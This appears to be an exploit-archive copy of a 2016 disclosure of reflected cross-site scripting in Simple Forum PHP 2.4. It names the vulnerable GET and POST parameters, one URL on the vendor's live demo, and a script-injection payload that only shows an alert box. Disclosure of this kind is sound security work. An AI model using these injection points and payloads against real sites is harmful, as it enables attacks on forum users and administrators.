Simple Forum PHP 2.4 Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Simple Forum PHP 2.4 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>=====================================================
# Simple Forum PHP 2.4 - Reflected XSS
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable parameter : SysMessage
Mehod : GET
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://localhost/forum/preview.php?SysMessage=[payload]


Vulnerable parameter : search
Mehod : POST
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://simpleforumphp.com/forum/admin.php
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
</BODY></HTML>

TOP

Malware :

None in database

Last 20

Exploits :

Last 20